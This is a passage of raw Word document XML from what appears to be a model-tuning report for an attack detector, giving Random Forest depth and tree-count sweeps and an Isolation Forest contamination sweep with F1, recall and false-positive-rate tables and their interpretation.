            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7475 / 0.0550</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7311 / 0.0822</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7584 / 0.0529</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t>worse* than</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>20 on both datasets.** This is a textbook regularisation result: fully grown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>trees on 43 engineered features drive leaves down to memorised singletons, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the ensemble average retains some of that variance as both lost F1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(D1: 0.7850 vs 0.8006 at n=500) and extra false positives (FPR 0.0424 vs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>0.0310). Capping depth at 20 removes the memorisation tail while leaving the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>trees deep enough to isolate real feature interactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`max_depth=10` is an underfitting trap with an instructive signature.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> On</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">both datasets it produces the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>highest recall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in its column (D1: 0.752 at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">n=500 vs 0.730 at depth 20) but also the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>highest FPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0.0525 vs 0.0310 —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>~70% more false alarms). Shallow trees cannot carve out the benign boundary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">precisely, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class_weight="balanced_subsample"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pushes the resulting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>borderline cases toward the attack class: the model compensates for missing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>capacity by over-flagging. On D2 the pathology deepens with ensemble size —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>falls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> monotonically from 0.7430 (n=50) to 0.7311 (n=500) — because</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>averaging more trees converges the ensemble ever more tightly onto the same</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>biased, capacity-limited solution. More trees cannot fix a depth problem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`n_estimators` is a mild, monotone stabiliser that plateaus by ~200.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the dominant depth-20 column, going 50 → 500 buys +0.008 F1 on D1 and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>+0.007 on D2, with essentially all of the gain in by n=200 (F1 changes by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>under 0.003 from 200 → 500 on both datasets). Consistent with Ben's XGBoost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>finding, RF's ranking quality is dominated by the feature representation, not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ensemble capacity: the model is robust — hard to break, hard to improve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chosen setting — Random Forest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chosen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (production)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The sweep shows depth ≈ 20 dominates both shallower (10) and unbounded (None) on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>both</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> F1 and FPR, on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>both</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> datasets; production 24 sits on this optimum.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_estimators</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>400</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (production)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>On the ≥200 plateau (grid best at 500 leads 200 by only 0.0017 F1 on D1 / 0.0025 on D2); 400 keeps train time ~3 s.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>class_weight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>balanced_subsample</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (pinned)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The cost-sensitive imbalance remedy at 1:3 prevalence; not swept here — its role is analogous to XGBoost's </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>scale_pos_weight</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>, which Ben's sweep showed to be an FPR dial.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The production configuration (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators=400, max_depth=24</w:t>
      </w:r>
      <w:r>
        <w:t>) was chosen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">before this sweep; the grid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>validates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it — (400, 24) is not itself a grid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cell, but it is bracketed by the swept plateau cells (200/20 and 500/20),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>which sit within 0.003 F1 of each grid's best (D1: 0.8006 / FPR 0.0310 at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>500/20) — rather than contradicting it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Isolation Forest — contamination sweep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fixed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_estimators=300</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_samples=0.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_features=1.0</w:t>
      </w:r>
      <w:r>
        <w:t>. Trained on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>benign training rows only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (unsupervised); each row is evaluated at that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>contamination's own calibrated threshold (see methodology note above).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 1 (ROC-AUC = 0.8120 at every setting)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contamination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.5488</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.4318</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0472</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.6413</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.5971</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0883</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.6023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.6759</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1893</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.5638</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7310</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2873</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>wrapper (fixed 0.5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.2492</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1457</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
